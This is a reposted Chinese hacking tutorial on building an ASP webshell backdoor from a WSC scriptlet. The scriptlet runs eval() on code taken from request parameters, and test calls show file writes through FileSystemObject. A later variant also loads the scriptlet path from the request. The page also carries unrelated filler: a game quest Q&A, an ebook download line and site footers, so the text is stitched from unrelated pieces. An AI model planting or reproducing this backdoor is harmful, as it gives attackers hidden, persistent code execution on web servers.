利用wsc来做一个asp后门及后续 (利用vi)

教程大全 2025-07-15 15:26:17 浏览

ScriptCodingInfo.wsc代码如下,该文件可以改成任意后缀:

利用wsc来做一个asp后门及后续
以下是引用片段:
sub lcx(b)
eval(b)

end sub
]]>


backdoor.asp内容如下:

以下是引用片段:
<%
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx(b)
%>

调用方法如下:

以下是引用片段:
"Scripting.FileSystemObject").
OpenTextFile("c:\1122.txt"),8,True,0).WriteLine("123")

注意这里的a=只能是vbs的代码,不可以接受像response、request之类的asp的东东。如果是2000服务器可以在backdoor.asp远程调用ScriptCodingInfo.wsc,像Set fs = GetObject("script:")

2003服务器中不可以。算一个思路,鸡肋,谁有更好的办法完善,能够直接调用cs的asp木马的c端就好了。
#p#

突然看到了lcx巨形牛头人发了一个帖子
但是就像牛头人所说的,没有加进request和response类很不爽。于是我作了一个简单的修改。

ScriptCodingInfo.wsc 代码

以下是引用片段:
xml version="1.0" encoding="gb2312" standalone="yes"?>






sub lcx(b,a,c)
set response=c ’加入request和response进来。就可以直接调用了
set request=a ’修改 by:phpeval.cn
eval(b)
end sub
]]>


test.asp代码:

<% 
b=request("a")
Set fs = GetObject("script:d:/web/wwwroot/ScriptCodingInfo.wsc#haiyangtop")
fs.lcx b,request,response
%>

测试方法:

以下是引用片段:
"response.write(request(""c"")):response.end")&c=phpeval

不知道这是不是lcx巨形牛头人所说的那个c端。我一直不太理解“能够直接调用cs的asp木马的c端就好了”lcx巨牛的这句话的意思
如果改成
Set fs = GetObject(request("b"))
然后用

以下是引用片段:
"response.write(request(""c""))
:response.end")&b=script:d:/web/wwwroot/ScriptCodingInfo.
wsc%23haiyangtop&c=phpeval

这样好象更有诱惑性。

【编辑推荐】

  1. 4.1.7 使用SQLRootKit网页数据库后门控制案例
  2. 入侵Windows2000系统放置后门的方法
  3. Linux下的后门和日志工具
责任编辑:佚名 来源: 黑客风云
分享到微信

微信扫码分享

分享到微博
相关推荐
微博
QQ
微信
复制链接

微信扫码分享

技术栈公众号

技术栈公众号

业务
速览
在线客服
媒体
CIOAge HC3i
社区
博客 鸿蒙开发者社区
教育
学堂 精培 企业培训 CTO训练营

彩虹岛的暗夜之花在哪得到?

关于金羽铃的系列任务,我做到第20多步的时候,一个叫亚修拉之石的任务,交了就没后续了,金羽铃也没给我,没下一步任务可接,请问是不是任务有问题?这个任务完成之后还没有给暗夜之花,是在后续任务中给的。 这整个任务还没有完结,只是完成一小段,后续任务还会在以后版本出的。 这个不是不见了,而是这个任务在此阶段已经终结了,在后续版本中会继续发放金羽玲,而暗夜之花也是在后续版本中才会出现,请玩家在后续版本继续此任务,我们也会在后续版本中给予提示。

续三侠剑电子书在哪下载

三侠剑400回免注册直接下载

本文版权声明本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,请联系本站客服,一经查实,本站将立刻删除。

上一篇阿里开源后浪云混部系统Koordinator技术揭

下一篇Ubuntu上安装ElisaKDE音乐播放器ubuntu系统

发表评论

热门推荐